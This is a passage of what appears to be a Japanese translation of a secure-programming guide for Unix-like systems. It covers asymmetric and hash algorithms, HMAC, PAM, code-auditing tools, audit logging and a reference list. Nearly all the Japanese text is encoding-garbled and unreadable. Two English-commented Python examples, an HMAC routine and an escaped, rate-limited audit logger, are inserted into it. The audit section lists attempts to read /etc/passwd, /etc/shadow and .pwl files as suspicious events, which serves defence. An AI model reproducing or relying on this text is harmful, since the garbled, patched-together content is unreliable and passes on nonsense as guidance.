RC4  RSA Data Security Inc ̊Ɣ閧łBRkĂ܂
ŁA̗pɌIȖ@IQƂ͎v܂B RSA ̗͂
p҂ɑ΂Ė@Iu{ƁA咣𑱂Ă܂(RSA ł邱Ƃ
Ȃ̂A͂肵Ă܂B[UӖȍٔɊ
\̂͋^悤܂)B RC4 gȂAoė
pĂB RC4 ŏ 256 oCg͐؂̂ĂĂ
BȂƐƎコ邱ƂɂȂ܂B SEAL  IBM 
܂BėpȂłB SOBER ɂ͓܂B
̏L҂́ApĂΎRɎgĂ܂ȂƂĂ܂
AX̗p̏QɂȂ܂Bɖʔ̂́A[hŃubNÍ
ASY𗘗pł_łBubNÍASYXg[
̂悤Ɉ܂BXg[Íg[ÚẢ@
Ă(ƍLJĂASYIԂƂł
)B

 

10.5.3. JASY

JÍ@(閧ɏA𑗂ꍇɓɗpĂ܂)ŁA
LpĂASY͂ق̂킸łBLpĂA
SYɁARSA ܂B RSA ̃ASYɂ͓܂B
͕čɌ肳܂A 2000 N 9 ɓ؂܂̂ŁAR
Ɏg܂BĐ̒l𕜍A肵ȂłBU
҂ RSA gĒڐ̒lnǍʂJ܂B邱Ƃ
A閧Jł邩ł(ۂɂ͖͂ɂ͂Ȃ܂BvgR
̑啔́A[UŌvZnbVɏ̂Ă邩
łB͐f[^ł͂܂B܂茋ʂ͌J܂)B܂
̒lA͐΂Ȃł(̒l
JĂ܂܂)BɑoɃ_ȃpfBOǉ
΁Ał܂(PGP ͂Ă܂)Bʂ̉@ Optimal
Asymmetric Encryption Padding (OAEP)ƌĂł܂B

Diffie-Hellman ASÝA2 ҊԂŃZbVv
ɍLpĂ܂Bꎩgł́A݂ɒNł邩̕ۏ؂͂
܂̂ŁA҂݂͑܂BAݕĥɂ́A
Ɍʂ܂B 1997 Nɐ؂܂B Diffie-Hellman g
L쐬ȂA͂߂ɕKnbVĂ (Ll𒼐
gU@݂܂)B

NIST  digital signature standard (DSS)J܂(ElGamal ÍVX
ẻǔłł)B͓dq̐ƔF؂ړIƂĂ܂BJ
 1 ɁA͎ȂAƂ܂B 

RSA  Diffie-HellmanAEl Gamal @́A\IȑΏ̌ƔׂāÃZ
LeB̂ɂɃrbgv܂B 1024 rbg 80
rbg̑Ώ̌Ƃ悻łB̍lł́Ãrbg͌ݕKv
ȍŒ჉CłBJ킸ȃrbgɂKvȂA
elliptic curve Í(ȉ~ȐÍ)𗘗pĂǂł傤(IEEE P1363 
͋ȐĂ܂BK؂ȋȐ͍̂ł)B
ӂׂ_܂Belliptic curve Íɂ͓͂܂񂪁A
̍Zpɓ_ł(elliptic curve Í͏\ɍŁA
͎̍ۂɕʂ̈ÍZbV⋐ȈÍ̗pɂ͕Kv
܂)B

 

10.5.4. ÍnbVEASY

nbVÍASYKvȃvO܂B܂uC
ӂ́vʂ̃f[^󂯎āAU҂t]̂ȌŒ蒷̐
֐ł (Ƃ΁AU҂ʂ̃f[^gāAl𐶐
̂Ȃ̂ł)BN MD5 {łAŋ߂̐ʂ MD5 
128 rbgł͂͂\łȂƂ܂[van Oorschot 1994]B
܂A̍U MD5 ̖h̉܂[Dobbertin 1996]BƊEgb
v̈ÍƂ MD5 jAٗp_̊֌WŒقĂAƂ\
ۂɂ܂(John Viega  Bugtraq  August 2000 N 8  22 ɓe
LĂ)B\͒Nł܂A_ȂɌ
Ă܂̂ŁAɔjƂ̂͂Ƃ炵܂BVR
[hȂAMD5 ̂ SHA-1 gĂBIWi SHA
(SHA-0 ƌĂ΂Ă܂) ͎gȂłB SHA-0  MD5 Ɠ悤
Ȏ_܂BnbVASYɂƃrbgKvȂA
SHA-256  SHA-384ASHA-512 gĂBdĺANIST  FIPS
PUB 180-2 ɂ܂B

 

10.5.5. ̊mF

ʐM鎞ɂ́A炩̐̃`FbNKvł(Íɂ
łBU҂ύXāAu_vȒlɂĂ܂܂)
`FbN̓nbVASYŎł܂BAڃnbV֐
gpȂł(ƁA[UugvUɂ炷Ƃɂ
܂BU҂nbVl𗘗pāAI񂾃f[^ǉAV
nbVvZUł)B@́Aʂ́uHMACvłBŐ
̃`FbN̂悤ɌvZ܂B

  H(k xor opad, H(k xor ipad, data)).                                  

H ̓nbV֐ł(ʂ MD5  SHA-1 ł)ŁAk ͌łB܂A
̊mF́AHMAC-MD5  HMAC-SHA-1 ɂȂ܂B MD5 ͎_
̂́A̍\ł͐Ǝ㐫͖ƎvĂ܂BāA
HMAC-MD5 (̍lł)肠܂Bڍׂ́AIETF RFC 2104 ɒ`
Ă܂B

HMAC ɂ@ł́AM҂M҂ƂȂēf[^Uł邱
ƂYȂłB͕iɂ͂Ȃ܂BȂ
΂ȂȂȂAJgāAM҂M҂̔閧Łuv
ĉBŋUɂU͉ł܂AԂĂ
܂܂BĂ̊ł͕Kvł͂܂B
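The HMAC construction `H(k xor opad, H(k xor ipad, data))` written out step by step, as an added example in Python (not the page's code), including the key-padding step the formula leaves implicit and the receiver-side check the section says a bare hash cannot provide. `hmac_from_definition`, `seal` and `open_sealed` are constructed names; the pad bytes 0x36 and 0x5C and the "hash keys longer than one block" rule are those of IETF RFC 2104, and the result is compared against Python's own `hmac` module.

```python
import hashlib
import hmac

# Added example, not the page's code: HMAC built directly from the formula
# H(k xor opad, H(k xor ipad, data)) of RFC 2104, with the key padding step
# the formula leaves implicit, checked against Python's hmac module.

IPAD_BYTE = 0x36
OPAD_BYTE = 0x5C


def hmac_from_definition(key: bytes, data: bytes, hashfunc=hashlib.sha1) -> bytes:
    block = hashfunc().block_size          # 64 bytes for MD5 and SHA-1
    if len(key) > block:                   # long keys are hashed first
        key = hashfunc(key).digest()
    key = key.ljust(block, b"\x00")        # then zero-padded to one block
    inner = hashfunc(bytes(b ^ IPAD_BYTE for b in key) + data).digest()
    return hashfunc(bytes(b ^ OPAD_BYTE for b in key) + inner).digest()


def seal(key: bytes, data: bytes, hashfunc=hashlib.sha1) -> bytes:
    """Sender: append the tag to the message."""
    return data + hmac_from_definition(key, data, hashfunc)


def open_sealed(key: bytes, blob: bytes, hashfunc=hashlib.sha1):
    """Receiver: returns data if the tag verifies, None otherwise. With a
    plain unkeyed hash here, anyone could append data and recompute."""
    tag_len = hashfunc().digest_size
    if len(blob) < tag_len:
        return None
    data, tag = blob[:-tag_len], blob[-tag_len:]
    if not hmac.compare_digest(tag, hmac_from_definition(key, data, hashfunc)):
        return None
    return data
```

The outer hash is what defeats the length-extension trick the section warns about: an attacker who appends to `data` would need the inner digest under a key they do not hold.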

 

10.5.6. ̑Í֘A̖

Íƃf[^̐o`FbNĂBꂪdvłBÍ
ɐ̃`FbNƂĂAɗĂ͂܂BU
rbgύXāAʂ̒lɂĂ܂܂B̒lɕύX
ȂƂĂA̒lύXł΂ŏ\łBʂ́A̍
U邽߂ɁAƔ閧ێɕʂ̌gĂB

\ɋc_łĂȂ 1 ɁugtBbŃv܂B
胁bZ[WÍÄÍjĂȂĂAU҂͈Í
bZ[W炳܂܂ȂƂĂ܂܂BƂ΁A2 
Ђ̎ВÄÍꂽdq[̃bZ[W肵͂
߂ƂƁA 2 ̉ЂĂ邩܂Bʂ̗Ƃ
āASSH ̎̑ɂ̓pX[h̎_邱ƂĂ܂
Bώ@҂̓pPbgāApX[h(͈͒̔)𐄑ł
BpX[ĥ͐łȂɂĂłB܂ApX[hɊ֘A
̑̏ł܂B̓pX[hĵɂȂ̎菕
ƂȂ܂B

Iɖ悤Ȑ^͂ȂłBMł(N
Mł邩)ωȂAʂ̌gĂB܂ɒԓ
gȂłB܂AZbVpX[h͕ύXĂ
B΁AU҂͐U肾ɖ߂Ȃ΂ȂȂȂ܂B

TĉÍȂ爳kׂłB͌Œ蒷̂փb_[
邱ƂɂȂAKǂƂ͌Ȃ̂łAbZ[W
̂ƓɁAbZ[W̎cɂ邢̃p^܂Bk
ʂȂ肻ȂAʂ́u܂vƍlĂǂł
傤B

֘AƂāAŒʐMvgR쐬Ȃ΂ȂȂȂAȑO
ǂȖ肪̂ĂB Bellovin[1989]̂悤 TCP/
IP vgR̃ZLeB̖_ÓTɗƎv܂B
Bruce Schneier [1998] Mudge ɂ Microsoft PPTP ̎j
₻̌̎lłBJԂ܂AVvgR͂ǂ
̂łAKLJăr[󂯂ĂBpł̂͗
pĂB

 

10.6. PAM g

Pluggable Authentication Modules(PAM)́A[U̔F؂_ɍsdg
łB Unix CNȃVXeɂ PAM T|[gĂ̂A
Solaris  Linux fBXgr[V̑唼(Red Hat Linux  Caldera
ADebian ̃o[W 2.2) FreeBSD 3.1 ŃT|[gĂ܂B PAM 
gƁAvOƔF؂̎dg(pX[h IC J[h)Ɨ
ɂł܂B܂AvO PAM ĂяoAPAM [JVXe
̊Ǘ҂ݒ肵e`FbNAǂ́uF؃W[vKv
^Cɔf܂BF؂KvƂȂvO(Ƃ΃pX[h
͂)쐬ĂȂA PAM ̗pׂłB Linux-PAM vWFN
gɂẮA http://www.kernel.org/pub/linux/libs/pam/index.html 
ĂB

 

10.7. c[

ZLeB̖AŌʂoOɌoc[݂
BAׂĂ̖킯ł͂܂񂪁AIŌ
ƂȖĂ܂Bł́AI[v\[Xƃt[\
tgEFAɏœ_𓖂āAc[Љ܂B

c[̃^Cv 1 ́A\[XR[h𒲂ׂāAZLeBɂȂ
Ȋm̃p^vOł(Ƃ΁A炩̎iŃC
u֐ĂяoƂAZLeB̐Ǝ㐫ɂȂ܂)B
̃vÓu\[XR[hEXLivƌĂ΂Ă܂Bł
Љ܂B

 E RATS (Rough Auditing Tool for Security)́ASecure Software
    Solutions ɂ̂ http://www.securesw.com/rats 擾ł
    B̃vO C  C++ ̃\[XR[hɂ悭X
    L܂BCZX GPL łB
   
 E Flawfinder ͎ĴŁA http://www.dwheeler.com/
    flawfinder 擾ł܂B C  C++ ̃\[XR[hɂ悭
    XL܂BCZX͂͂ GPL łB RATS Ƃ̈Ⴂ
    ́APython ŎĂ_łB RATS  Flawfinder ̊J҂́A
    ōőP̑gݍ킹̃vOI[v\[XŎYݏoƂɍ
    ӂĂ܂B
   
 E ITS4  Cigital(O Reliable Software TechnologiesB RST)ɂ
    ̂ŁAÓI C  C++ ̃R[h`FbN܂BpɎg
    ȂΎRɗpłA\[XR[hpł܂BCĔzz
    \łBÁuI[v\[Xv` Open Source
    Definition <http://www.opensource.org/osd.html> (OSD)Ń[X
    킯ł͂܂B OSD  6 Ԗڂ̊I[v\[X
    CZXƂāupړIł̗p̋֎~v֎~Ă܂B
    ITS4  http://www.rstcorp.com/its4 擾ł܂B
   
 E LCLint ͐ÓI C vO`FbNc[łBԂقƂ
    ǂȂĂALCLint ͗Dꂽ lint Ƃėpł܂Bɓw
    ăvOɒ߂΁ALCLint ͕WI lint sǂ
    `FbN苭͂Ƀ`FbNs܂BƂ΁Aobt@I[o[t
    [N肻ȂƂÓIɌôɗpł܂B\tgE
    FÃCZX GPL ŁA http://lclint.cs.virginia.edu 擾
    ł܂B 
   
 E cqual ͌^x[Xŕ͂c[ŁAC vÕoOo
    ܂Bcqual  C ̌^VXegāAɃ[U`̌^Cq
    ǉĂ܂BƂ΁AutaintedvuuntaintedvƂ悤
    lLqł܂(Perl ̉`FbNƎĂ܂)BvO}̓v
    Oɉ߂ cqual ͏Cq琄_sACq
    K؂ǂ`FbN܂Bcqual ͕͌ʂ Program Analysis
    Mode Ƃ emacs x[X̃C^tF[Xgĕ\܂B cqual
    ̌o[ẂAC vȌ̐Ǝ㐫肻ȕ
    mł܂BOo[W cqual ł Carillon ́AC vO
    ɂ Y2K ֘ÃoO̂ɗp܂B\tgEFA
    GPL CZXŁA http://www.cs.berkeley.edu/Research/Aiken/cqual
    擾ł܂B
   
 E Cyclone  C CNȌŁAC ̃ZLeB̎_r̂
    ړIłB錾ꂩuƈSȁvɗ͂łڍs
    ܂BA͉ɂłɗ킯ł͂܂(͂悭
    ԈႢ̂ɖ𗧂܂񂪁AȂ̍l
    Ă킯ł͂܂)B 2001 N 12  John Viega has
    reviewed Cyclone <http://www.securityfocus.com/guest/9094>  John
    Viega ͎̂悤ɏqׂĂ܂BuCyclone ł邱
    ͂܂ȂłB C ňłAC ̎ǂȃp[
    Ă͂܂Bɂ炸ASmłƂ邱Ƃ񑩂Av
    O}{ɏdł邳܂܂ȋ@\Ă܂BcO
    Ȃ̂́ACyclone ͂܂嗬ƂȂׂĂ킯ł͂Ȃ_
    łB𖳂ȂA܂ Java(͕֗ȃc[g
    C)z悤ȗDʐ񋟂łĂȂ̂ŁA̖nȋZpg
    XN𕉂l͂܂B񐔔N̓ Cyclone ͔\͂̓_
     C ɋ낵߂ȂAnċłɂȂALT|[g
    錾ɂȂł傤B̂悤ȓ΁A C ̂ĂĂǂ
    Ǝvł傤vB Cyclone RpĆAGPL  LPGL ŃCZX
    Ă܂Bɏڂ́A Cyclone web site <http://
    www.research.att.com/projects/cyclone> ĂB
   
ʂ̉@ɃeXgp^쐬āAvO𓮂@܂
B̓vO_鎎݂ 1 łBc[
܂B

 E BFBTester(Brute Force Binary Tester)́AGPL CZXłB̃v
    O͐vɃoCivOɑ΂ăZLeB̃`FbN
    s܂B BFBTester ̓R}hC̒PƂ͕̈
    ϐ̃I[o[t[`FbNł܂Bo[W 2.0 ȏł̓e
    |t@C̍쐬悤Ƃ铮Ďł悤ɂȂ܂
    (SłȂe|t@CgĂȂ`FbN܂)
    BȑO BFBTester  Linux ł͓܂ł(Linux  POSIX X
    bh̎ɂZpIȖ)BAo[W 2.0.1 ł̓t
    BbNXĂ܂Bɏڂ́A http://
    bfbtester.sourceforge.net/ QƂĂB
   
 E fuzz <http://fuzz.sourceforge.net> ͑̃\tgEFAeXgc
    [łB̃eXǵA_ȃf[^ŃvOUăeX
    gȂ]܂BZLeBɌ肵c[ł͂܂B
   
삵ĂvO`āAR[hɂZLeB̖𔭌
悤Ƃc[񑶍݂܂B̃c[ɊŶ́AV
{bNfobK(gdb ̂悤)g[XvO(strace  ltrace
̂悤)łB炭܂育ȂƎv܂A Fenris <http://
razor.bindview.com/tools/fenris> (GPL CZX)ƂvO
܂BhLgɂ Fenris ̂ƂuoOgbNȒPɂ邽߂
AԂۑĕ͂AIɋtRpC@\肵
Aėpg[TłBZLeBčR[hAASYAvgR
𕪐͂܂BvO\̃g[X\ʂ̏ƂĎsp
XAAóAX񋟂܂vƂ܂B 1 
̌nŋ[vO܂B Subterfugue łB

ʓIɎ_Ȑi(ftp T[ot@CA[EH[)\z
ȂAZLeBXLc[𗧂̂͂킩肾Ǝv
܂BDꂽ̂ 1  Nessus <http://www.nessus.org> ܂B
ɂ̃c[܂B̎̃c[̓ObVEeXg
(AeXg)ŝɔɕ֗łBߋɓ肵ĂƎ㐫
̃XggĂ邩łBAVvO̖𔭌
̂ɂ́AɗƂ͂܂By󒐁FObVEeXgƂ́Av
ÔoO𒼂pŁA܂ʂ̃oOĂȂǂ
Am߂eXgw܂z

̃c[ĂяoāAՂSɎKvoĂP[X悭
܂B Open-Source PKI Book <http://ospkibook.sourceforge.net> ɂ
AJ(PKI)pɁAI[v\[X̃vOڂĂ
܂B

ASłȂvbgtH[̐ݒŁuSȁvvO𓮂
̂͂قƂǈӖ܂B낵΁AVXełɂ@
𒲍āAUɑ΂Ăhł悤ɃVXeݒA̓J
X^}CYĂB Linux Ȃ΁A Bastille Linux  http://
www.bastille-linux.org ŗpł܂B

 

10.8. Windows CE

Windows CE @SɂȂA Maricia Alforque ́uCreating a
Secure Windows CE Devicev http://msdn.microsoft.com/library/techart/
winsecurity.htm. ǂłB

 

10.9. čL^

vOZbVJnA͕sRȓ삪鎞ɂ́AčO
łBƂāAt⎞ԁAuidAeuidAgidAegidA[
AvZX idAR}hC̒lĂBčOƂ
̂ syslog(3)𗧂̂͂悭mĂ܂BÔVXéA
̏(ɖ𗧂܂)L^ł܂Ȁ̎舵ɒ
ӂȂƁAUɗpĂ܂_ȖłBŏIIɂ́A
U҂vOɑ͂𕔕IɃRg[܂BU҂
Ǝvf[^L^ɁAu\zʂv̕Xgݒ肵Au
\zʂvłȂ݂͂ȃGXP[vĂB΃O
悤ȂƂɂ͂Ȃ܂BȂƁA{ɍԂɂȂ
BƂ΃[U䕶(NIL  EOF) ƁAȎԂ
܂BƂ΁AU҂s𖄂ߍނƁAD݂̃OsƂƂ
邱ƂŁAŐL^˂ł܂BЂǂbłA̕
̃GXP[v́AWKiɉĂȂ悤łB URL GXP[vD
݂ł(%hh  hh ̓GXP[voCg 16 ilł)AC ̋Ki
߂ƂāÃGXP[v݂܂(\ooo  8 il \X  X ɂ͓
ʂȕ܂BƂ \n ͉sł)B܂ALbgg
(^I  control-I ł)܂A127 傫ȃoCgl͂܂
܂B 

[UT[rXۍU(͏ȂƂč̒~)N댯
܂B̍ÚAč폜鑽ʂ̃Cxg𔭐邱
ƂŁAVXeL^ۑ郊\[XHׂ܂B̍Uɑ΂
Ώ@ 1 ́AčL^鑬xɐ݂邱ƂłBӐ}Iɔ
xxAu܂ɑ́včL^΍폜܂BŰ^
̂ɑ΂ĂAxx悤ɂĂBA
PƂ̍U҂[Uł邩̂ƂĂP[X悭܂
B

񉽂usRȓvȂ̂Î́AvO̓Ɨ\
ĂgɍE܂BȑO_͂̃tB^`FbNɈ
P[X́ȂΏۂƂȂ܂ (Ƃ΁ANIL )Bʏ험p
RȂ͂́A炭Ô悢ł傤BƂ΁AK{
̃tB[h CGI vOɎs铙B /etc/passwd 
/etc/shadow ̂悤ȏ́AP[X񂠂܂Bl
Windows ́uWXgvt@C .pwl t@CɃANZX悤Ƃ
̂sRłB

čɃpX[hL^ȂłBāAʂ̃VXeɃpX
[hĂ܂ꍇ悭܂BƁApX[h̋L^
VXe̊Ǘ҂ɁAǊO̕ʂ̃Rs[^ւ̐NF߂邱Ƃ
Ȃ邩܂B
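The two audit-logging defences this section describes, escaping attacker-supplied bytes before they reach the log and capping the rate at which audit records are written, as an added example in Python (not the page's code). `sanitize_for_log`, `AuditLog` and the in-memory `lines` list standing in for `syslog(3)` are constructed; the escapes follow the C convention the text mentions (`\n`, `\t`, `\r`, otherwise `\ooo` octal) so that NUL, newlines and bytes above 127 cannot forge or split a record, and suppressed events are counted and reported rather than silently dropped.

```python
import os
import time
from typing import List, Optional

# Added example, not the page's code. Log lines and limits are constructed.

_NAMED = {0x09: "\\t", 0x0A: "\\n", 0x0D: "\\r"}


def sanitize_for_log(data: bytes) -> str:
    """Escape anything outside printable ASCII with C-style escapes (\\n,
    \\t, \\ooo) so a NUL, a newline or a byte > 127 in attacker data cannot
    forge or corrupt a record; the backslash itself is escaped too."""
    out: List[str] = []
    for b in data:
        if b == 0x5C:                       # backslash
            out.append("\\\\")
        elif 0x20 <= b < 0x7F:              # printable ASCII passes through
            out.append(chr(b))
        elif b in _NAMED:
            out.append(_NAMED[b])
        else:
            out.append("\\%03o" % b)        # NUL, DEL, high bytes: octal
    return "".join(out)


def _ids() -> str:
    """uid/euid/gid/egid/pid as the section lists; -1 where unavailable."""
    def get(name: str) -> int:
        return getattr(os, name, lambda: -1)()
    return (f"uid={get('getuid')} euid={get('geteuid')} "
            f"gid={get('getgid')} egid={get('getegid')} pid={os.getpid()}")


class AuditLog:
    """Records suspicious events with a cap per one-second window so a
    flood cannot fill the disk; suppressed events are counted and reported
    when logging resumes instead of being lost without trace."""

    def __init__(self, max_per_second: int = 50) -> None:
        self.limit = max_per_second
        self.window: Optional[int] = None
        self.count = 0
        self.dropped = 0
        self.lines: List[str] = []          # stand-in for syslog(3)

    def record(self, event: bytes, now: Optional[float] = None) -> Optional[str]:
        now = time.time() if now is None else now
        window = int(now)
        if window != self.window:
            if self.dropped:                # first write of a new window
                self.lines.append(f"{window} audit: suppressed {self.dropped} events")
                self.dropped = 0
            self.window, self.count = window, 0
        if self.count >= self.limit:
            self.dropped += 1
            return None
        self.count += 1
        line = f"{window} {_ids()} event={sanitize_for_log(event)}"
        self.lines.append(line)
        return line
```

Because `record` takes the raw bytes and escapes them itself, a caller cannot forget the sanitising step, and a username containing a newline shows up as `\n` in one record rather than as a second, forged record.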

 

10.10. IȘRk

̃hLg̔ezbłARs[^ƒʐM@͂
̏R炵Ă邱ƂYȂłB̘Rk{ɈS
Ȃ̂Ƃ͍̂łBdgɕKvȂ̂mĂl͂
񂢂܂BRs[^fBXvCAL[{[hȂł镔i
o鍂ĝłBfBXvĆAꂽItBX̕
ɔ˂̂ł\ł [Kuhn 2002]Bf̃CgŒʐMs
Ă邱Ƃ͏\ɂ킩܂B

 

10.11. ̑

L̓éAZLeBEKChCȂ̂łAɂނł
̂łB

ȂƂÖꕔ́AvOŎOɃ`FbNĂ(
΁AvOJnƂ)BƂ΁AfBNgŁu
stickyvrbgĂ邱ƂOɂĂȂA{ɂȂĂ
邩eXgĂB̂悤ȃeXgɂ͎Ԃ͂܂񂵁A
ɂĐ[Ȗh͂łBꂼ̌ĂяoŃeXg
sԂ邱ƂCɂȂȂA߂ăCXg[ɍs悤ɂ
BAvP[VNɍsƂɗǂłB

gݍ݂ŃXNvggĂȂǍꂪϐݒ肵
AXNvgsvOɈe^邩܂B
͖hłB

GȐݒpꂪKvȂǍɃRgARgAE
gSȗႪ񂠂悤ɂĂBu#v̓RgƂĂ
g܂Áu̍s̎c̓RgvӖ܂B

Ȃׂ root  setuid  setgid vO쐬Ȃł
BɁA[Uɂ root ŃOC悤ɂĂB

R[hɓdqĂBp҂͑Ă̂pł
̂ǂ`FbNł܂B

S߂vO쐬ꍇ́AÓIɃNsƂ
Ă݂ĂBS߂vOINg
悤ɂ΁AIȃCũN@\_Uɑ΍Rł܂
B̕@ɂ͌_܂BgpfBXN⃁X
ɂ܂([`𕡐Rs[邩ł)BɈ̂́A
Cu̍XV(Ƃ΁AZLeB̐Ǝ㐫h) ʓ|ɂȂ
Ȃ_łBẴVXeł͎Iɂ͍XVłAƎɍXV
Ď邵܂B

R[h𒭂߂Ă鎞ɂ́AɃ}b`ȂP[XׂĂĂ
BƂ switch ꍇAǂ̃P[Xɂ}b`Ȃ
ǂȂ̂HuifvΏUɂȂꍇɂǂȂ̂H
ǂȂǁB

PɃt@Cu폜vĂAfBXNt@C̃f[^͏
BVXȇ́Au폜vAōėpł悤
ɂ܂B܂f[^ꎞIɑ̏ɒuĂꍇ悭܂(
 swap t@CAe|Et@CƂ)BہAU
ɑ΍Rɂ́Af[^̏㏑ł͏\ł͂܂BCfBA
ł̖ɂẮAÓTIȃhLgł Peter Gutmann 
́uSecure Deletion of Data from Magnetic and Solid-State Memoryv
<http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html> 
܂BU҂́Aʂ̎igƂł܂BƂ΁AR
s[^odgĎ(RVXéAdgK
ɏ]Aɑ΍RĂ܂)A閧ɍU܂(L[{[hɉB
Ďu)B

ZLeB̐Ǝ㐫C鎞ɂ́Auxv̒ǉlA(C
) Ǝ㐫NƂ鎎݂mÃO悤ɂĂ
B邱ƂŁAŰ@炵܂BUisĂ邱Ƃ
ɂȂ邱ƂŁAɍU҂Uł邩ǂAOɒׂ@
Ȃ܂B܂AƎ㐫NmVXeɂȂ킯łB́AF
؈ȑOɃT[ovÕo[WJƁAZLeBD܂
ȂƂĂ܂BJĂ܂ƁAU҂̃o[Wœ
삷UɍiĂ₷₷ƍUł邩łBvOɂ́A[U
ɑ΂Č̈ӂɃo[WuUvƂł̂܂B
ƍU҂́uԈvU邱ƂɂȂAUoł܂BƎ㐫
̓lbg[NŋN̂ŁAKZLeBEXLiŐƎ㐫m
悤ɂĂB Nessus(http://www.nessus.org) ƘAƂāA
ނ̃I[v\[XȃZLeBEXLioł邩ǂ
m߂ĂB΁A\tgEFAXVɖڒȃ[ÚAZ
LeB̐Ǝ㐫XL邱ƂŁAm邱ƂɂȂ܂(
Ƃ邩܂)B

ɂ́ÃhLĝ悤ȃZLeBKChCr[
B߂ Chapter 11 ɂ錋_͍ēǂĂBċCy
u͂߂Ɂv(Chapter 1)ɖ߂āAēǂ܂傤B

 

Chapter 11. _

                                    ̏I͎n߂ɂ܂BCʂ 
                                    Ĉ悢B         
                                                                       
                                       񐹏Rwǧt 7  8 
                                                                  (NIV)

Linux  Unix ̂悤 Unix CNȃVXeŁAɈSȃvO
݌vẾAۂƂĂƂłBɈSȃvO
ŔAlׂ͂ĂɓK؂ɑΉAGӂĂ邩
Ȃ[U䂵Ăɑ΂ĂAlɑΉȂ΂Ȃ
Ȃ_ɂ܂BS߂vO̊J҂́AgpĂ
vbgtH[ɂĐ[AKChC(̃hLg)
ׂēKpAiグvZX݂(sAEr[)AvO
̐ƎȂƂ炵čsKv܂B

ł͌_ƂāÃhLgŌƂȂKChC
Ă܂B

 E ׂ͂Č؂ĂB͂ɂ̓R}hC̓͂
    ACGI ̓͂܂Busȁv͂ۂȂł
    Bu󂯓v͂Ȃ̂`āA}b`Ȃ
    ۂĂB
   
 E obt@I[o[t[ĂBvO(ƒ
    ԃf[^l)ŐΏȂ悤ɂĂB_ł́Av
    O~Oł̃G[̑\iłB
   
 E vO̓\ƂĂBC^tF[XS
    āAŏɂAݒƃftHgSɂAtFCEZ
    [tɂĂBԂĂ(Ƃ΁A/tmp ̂
    ȋLfBNgňSɃt@CI[v)BMɑoH
    MĂ(Ƃ΁AقƂǂ̃T[óAZLeB`F
    bN┃ꉿî悤ȋ@f[^ނŁANCAgMĂ
    ܂)B
   
 E Ӑ[̃\[XĂяoĂBlK؂Ȃ̂ɐ(
    Ƀ^LN^֘A)AVXeR[̕ԂĺAׂă`FbN
    B
   
 E TdɏԂĂBɐMłȂ[Uɑ΂ẮAtB
    [hobN͍ŏɂAo͂ĂAxꍇɂΏ
    ĂB
   
 

 

Chapter 12. Ql

                                    ҂̌tׂ͂āA˂_BB 
                                    ЂƂ̖q҂ɗRAWƂ 
                                    WBȂA킪qA 
                                    SB͂LĂ肪 
                                    ȂBwтΑ̂B     
                                                                       
                                    񐹏Rwǧt 12  11A12
                                                                (NIV)

Web ŗpłZpIȘ_邱ƂɋĂ_ɒڂĂ
BWeb ł̎̋Zp̑啔pł܂B

[Advosys 2000] Advosys Consulting (formerly named Webber Technical
Services). Writing Secure Web Applications. http://advosys.ca/tips/
web-security.html

[Al-Herbish 1999] Al-Herbish, Thamer. 1999. Secure Unix Programming FAQ
. http://www.whitefang.com/sup.

[Aleph1 1996] Aleph1. November 8, 1996. ``Smashing The Stack For Fun
And Profit''. Phrack Magazine. Issue 49, Article 14. http://
www.phrack.com/search.phtml?view&article=p49-14 or alternatively http:/
/www.2600.net/phrack/p49-14.html.

[Anonymous 1999] Anonymous. October 1999. Maximum Linux Security: A
Hacker's Guide to Protecting Your Linux Server and Workstation Sams.
ISBN: 0672316706.

[Anonymous 1998] Anonymous. September 1998. Maximum Security : A
Hacker's Guide to Protecting Your Internet Site and Network. Sams.
Second Edition. ISBN: 0672313413.

[AUSCERT 1996] Australian Computer Emergency Response Team (AUSCERT)
and O'Reilly. May 23, 1996 (rev 3C). A Lab Engineers Check List for
Writing Secure Unix Code. ftp://ftp.auscert.org.au/pub/auscert/papers/
secure_programming_checklist

[Bach 1986] Bach, Maurice J. 1986. The Design of the Unix Operating
System. Englewood Cliffs, NJ: Prentice-Hall, Inc. ISBN 0-13-201799-7
025.

[Bellovin 1989] Bellovin, Steven M. April 1989. "Security Problems in
the TCP/IP Protocol Suite" Computer Communications Review 2:19, pp.
32-48. http://www.research.att.com/~smb/papers/ipext.pdf

[Bellovin 1994] Bellovin, Steven M. December 1994. Shifting the Odds --
Writing (More) Secure Software. Murray Hill, NJ: AT&T Research. http://
www.research.att.com/~smb/talks

[Bishop 1996] Bishop, Matt. May 1996. ``UNIX Security: Security in
Programming''. SANS '96. Washington DC (May 1996). http://
olympus.cs.ucdavis.edu/~bishop/secprog.html

[Bishop 1997] Bishop, Matt. October 1997. ``Writing Safe Privileged
Programs''. Network Security 1997 New Orleans, LA. http://
olympus.cs.ucdavis.edu/~bishop/secprog.html

[Blaze 1996] Blaze, Matt, Whitfield Diffie, Ronald L. Rivest, Bruce
Schneier, Tsutomu Shimomura, Eric Thompson, and Michael Wiener. January
1996. ``Minimal Key Lengths for Symmetric Ciphers to Provide Adequate
Commercial Security: A Report by an Ad Hoc Group of Cryptographers and
Computer Scientists.'' ftp://ftp.research.att.com/dist/mab/
keylength.txt and ftp://ftp.research.att.com/dist/mab/keylength.ps.

[CC 1999] The Common Criteria for Information Technology Security
Evaluation (CC). August 1999. Version 2.1. Technically identical to
International Standard ISO/IEC 15408:1999. http://csrc.nist.gov/cc/
ccv20/ccv2list.htm

[CERT 1998] Computer Emergency Response Team (CERT) Coordination Center
(CERT/CC). February 13, 1998. Sanitizing User-Supplied Data in CGI
Scripts. CERT Advisory CA-97.25.CGI_metachar. http://www.cert.org/
advisories/CA-97.25.CGI_metachar.html.

[Clowes 2001] Clowes, Shaun. 2001. ``A Study In Scarlet - Exploiting
Common Vulnerabilities in PHP'' http://www.securereality.com.au/
archives.html

[CMU 1998] Carnegie Mellon University (CMU). February 13, 1998 Version
1.4. ``How To Remove Meta-characters From User-Supplied Data In CGI
Scripts''. ftp://ftp.cert.org/pub/tech_tips/cgi_metacharacters.

[Cowan 1999] Cowan, Crispin, Perry Wagle, Calton Pu, Steve Beattie, and
Jonathan Walpole. ``Buffer Overflows: Attacks and Defenses for the
Vulnerability of the Decade''. Proceedings of DARPA Information
Survivability Conference and Expo (DISCEX), http://
schafercorp-ballston.com/discex SANS 2000. http://www.sans.org/newlook/
events/sans2000.htm. For a copy, see http://immunix.org/
documentation.html.

[Cox 2000] Cox, Philip. March 30, 2001. Hardening Windows 2000. http://
www.systemexperts.com/win2k/hardenW2K11.pdf.

[Dobbertin 1996] Dobbertin, H. 1996. The Status of MD5 After a Recent
Attack. RSA Laboratories' CryptoBytes. Vol. 2, No. 2.

